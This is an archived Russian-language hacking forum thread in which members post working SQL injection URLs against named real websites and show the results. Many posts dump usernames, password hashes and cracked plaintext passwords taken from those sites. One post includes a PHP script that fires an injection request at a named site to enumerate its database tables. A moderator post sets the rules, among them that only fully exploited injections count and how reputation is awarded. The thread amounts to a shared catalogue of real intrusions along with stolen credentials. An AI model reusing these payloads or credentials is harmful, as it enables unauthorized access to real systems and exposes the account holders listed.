ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.05.2008, 13:25
|
|
Новичок
Регистрация: 04.05.2008
Сообщений: 16
Провел на форуме:
209786
Репутация:
45
|
|
http://www.pangeaday.org
PR=6
Код:
http://www.pangeaday.org/filmDetail.php?id=2+ union+select+1,2,3,4,5,6,concat(database(),0x3a, version(),0x3a,user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
database: pangea
version: 5.0.22-log
user: dr30628@192.168.1.134
|
|
|
24.05.2008, 15:56
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
http://www.austadiums.com/stadiums/stadiums.php?id=-1+union+select+1,2,concat_ws(0x3a,nick,password,em ail),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8,9+from+usuarios+limit+0,1/*
austadiums:auuMTgEV9/KAA
http://www.austadiums.com/stadiums/stadiums.php?id=-1+union+select+1,2,concat_ws(0x3a,user,pass,access ,secret),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 ,5,6,7,8,9+from+sympoll_auth/*
7c485725fbe136da96b2c9bc8e182999:m1shka505
c27f50fdbc6e40bef29c198d6d209b0c
====================================
http://www.comicus.it/view.php?section=interviste&id=-160+union+select+1,2,3,concat_ws(0x3a,username,pas sword,mail),5,6,7+from+users/*
boss:maerro
====================================
http://www.theshiznit.co.uk/review.php?id=-251+union+select+1,2,3,4,5,6,concat_ws(0x3a,id,nic kname,md5id,password,email),8,9,0,1,2,3,4,5,6,7,8, 9,0,1,2,3,4+from+shiznit_users+where+nickname='Bob '/*
Bob:6b333422e6af650594854e99ecca5fc8:shizzy1
====================================
http://www.isra.com/news/page_print.phtml?item=93478+and+1=0+union+select+c oncat_ws(0x3a,user,password,host),2,3,4,5,6,7,8,9+ from+mysql.user/*
kamtec:1b8bd1736ab19985:kamtec112
http://admin.isra.com/
http://sales.isra.com/admin/index.php
но пасс не идёт
====================================
http://www.amg.com.af/index.php?fuseaction=section.main&id=-13+union+select+1,2,3,concat(username,0x3a,passwor d),5,6,7,8+from+usr+limit+0,1/*
ckaminsky:7b490bbc3fa14869283ee2a6b4c49f1b:vivacolorado
gfranklin:5f4dcc3b5aa765d61d8327deb882cf99:password
|
|
|
|
www.fondationbrigittebardot.fr PR=5 |
24.05.2008, 16:50
|
|
Новичок
Регистрация: 04.05.2008
Сообщений: 16
Провел на форуме:
209786
Репутация:
45
|
|
www.fondationbrigittebardot.fr PR=5
www.fondationbrigittebardot.fr
PR=5
Код:
http://www.fondationbrigittebardot.fr/site/actu_en.php?id=75018+union+select+AES_DECRYPT(AES_ ENCRYPT(concat(user(),char(58),version(),char(58), database()),0x71),0x71),2/*
database: fonbriba
version: 4.1.11-Debian_4sarge7-log
user: fonbriba@localhost
P.S.Спасибо jokester'y.
|
|
|
|
24.05.2008, 17:22
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Напомню правила темы:
https://forum.antichat.ru/showpost.p...72&postcount=2
Код:
Выставление репутации в темах:
SQL Инъекции
PHP Иньекции
Пассивные XSS
Активные Xss
Админки
В связи с участившимися случаями накрутки репутации, при выставление репутации в этих темах ограничтесь её кол-вом от 1 до 3.
При оценивание постов этих темах, старайтесь сделать это как можно более рационально - не стоит ставить +3 за каждый пост, выбирайте наиболее объективную оценку.
Несоблюдение этого правила (высталение большего кол-ва репутации) будет говорить о накрутки репутации.
Накрутка репутации будет пресекаться минусами.
Посмотрел репутацию пользователей которые тут постили инъекции:
Код:
+5 SQL Инъекции 22.05.2008 20:12 Ded MustD!e расти большой)
Поставленно за это: https://forum.antichat.ru/showpost.p...postcount=5565
Код:
+5 SQL Инъекции 20.05.2008 22:44 zl0ba За активность в теме "SQL inj"
Поставленно за это: https://forum.antichat.ru/showpost.p...postcount=5541
Не знаю что вы нашли там полезного, ровно как и полезного в активности в этой теме в выкладывание инъекций, выводящих версии, но подобные случаи будут считаться накруткой репутации и за это будут выставляться минусы.
Так же напомню что выкладывать нужно только раскрученные инъекции (см первый пост темы).
Не понятно зачем писать ПР/ТИЦ и т.д. но при этом выводить только версию БД, не можете нормально раскрутить инъекцию, но хотите побольше плюсиков?
Тема не для вопросов/ответов, для этого есть другая тема - вопросы/ответы в этой теме считаються оффтопом, а за оффтоп ставяться минусы.
Возмущайтесь в другом месте, обсуждение действий модератора в несоответсвующем разделе будут пресекаться (Const)
Последний раз редактировалось Constantine; 25.05.2008 в 02:42..
|
|
|
|
24.05.2008, 18:17
|
|
Познающий
Регистрация: 23.04.2008
Сообщений: 39
Провел на форуме:
198086
Репутация:
135
|
|
выводит INFORMATION_SCHEMA.TABLES
с сайта samba.org.ua
PHP код:
<?
echo "<pre>\n";
@set_time_limit(0);
@ini_set("display_errors","0");
$hostname = gethostbyname('samba.org.ua');
function info($info)
{
global $hostname;
$responce = "";
$fsock = fsockopen($hostname,80,$errnum,$errstr,2);
$headers = "GET http://samba.org.ua/articles/?section=2-1 AND 1=0 UNION SELECT 1,2,COUNT(CONCAT_WS(0x203A20,TABLE_SCHEMA,TABLE_NA ME)),4 FROM $info HTTP/1.1\n";
$headers .= "Host: my-photo.ru\n";
$headers .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\n";
$headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
$headers .= "Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3\n";
$headers .= "Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7\n";
$headers .= "Keep-Alive: 500\n";
$headers .= "Connection: close\n";
$headers .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
fwrite ($fsock,$headers);
while (!feof($fsock)) $responce .= fread($fsock,1024);
fclose ($fsock);
$patern = "#<[\s]*sqlinj[\s]*>([^<]*)<[\s]*/sqlinj[\s]*>#i";
if(preg_match($patern, $responce, $rez)) echo $rez[1]; else echo 'Something not right...';
//echo $responce;
}
info("INFORMATION_SCHEMA.TABLES");
echo "</pre>";
?>
|
|
|
|
25.05.2008, 01:27
|
|
Участник форума
Регистрация: 29.01.2008
Сообщений: 207
Провел на форуме:
725225
Репутация:
450
|
|
http://www.verbste.kz
Код:
http://www.verbste.kz/ecommerce/index.php?idr=100+union+select+1,2,3,4,5,6+/*
database: verbste_verbste
user: verbste_verbste@localhost
version: 4.1.22-standard
http://www.kro.su
Код:
http://www.kro.su/news/foto/more/?pid=-1+UNION+SELECT+1,2,3,4,5,6,7/*
user: krosu_user@localhost
database: krosu_main
version: 4.1.22-standard-log
Последний раз редактировалось Ymrs; 25.05.2008 в 02:05..
|
|
|
|
25.05.2008, 05:49
|
|
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698
Репутация:
1446
|
|
nickjacobsen.com
Код:
http://www.nickjacobsen.com/index.php?id=2+union+select+1,2,3,unhex(hex(concat_ws(0x3,version(),user(),database())))/*
5.0.18�web12@localhost�usr_web12_1
Код:
http://www.nickjacobsen.com/index.php?id=2+union+select+1,2,3,concat(username,0x3,password)+from+members+limit+1,1/*
web12�L3Ahzh09
|
|
|
|
25.05.2008, 08:05
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Shoptop.kiev.ua - магазин
http://www.shoptop.kiev.ua/news_info.php?id=-1+union+select+1,table_name,3,4,5,6+from+informati on_schema.tables+limit+1,100/*&url=http://warezzz.biz
Mobiman.com.ua - Интернет магазин.
http://www.mobiman.com.ua/info_pages.html?pgID=17'+union+select+1,2,3,concat (user(),0x3a,database(),0x3a,version()),5/*
Instore.kz - интернет магазин. 2 колонки)
http://instore.kz/rss.php?language=17'+union+select+1/*&url=http://warezzz.biz
http://shop.sportmaster.ru/?cat_id=31796&cat_vendor[]=HEAD&cat_vendor[]=WILSON&cat_sort_url=sort&cat_sort_url=cost&cat_so rt_url='
Последний раз редактировалось sabe; 25.05.2008 в 09:21..
|
|
|
|
25.05.2008, 10:06
|
|
Banned
Регистрация: 15.01.2008
Сообщений: 63
Провел на форуме:
399884
Репутация:
46
|
|
http://www.yug.odessa.ua/new/view.php?tid=-1+UNION+SELECT+1,2,3,4,5,6&tr=a еще одна.
|
|
|
|
25.05.2008, 13:17
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
http://www.aei.brookings.org/
Код HTML:
http://www.aei.brookings.org/publications/abstract.php?pid=-296+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,version(),user(),database()),15,16,17,18,19/*
4.0.25-standard-log:aei_brookings@10.225.135.70:aei_brookings
Последний раз редактировалось ~EviL~; 25.05.2008 в 13:31..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
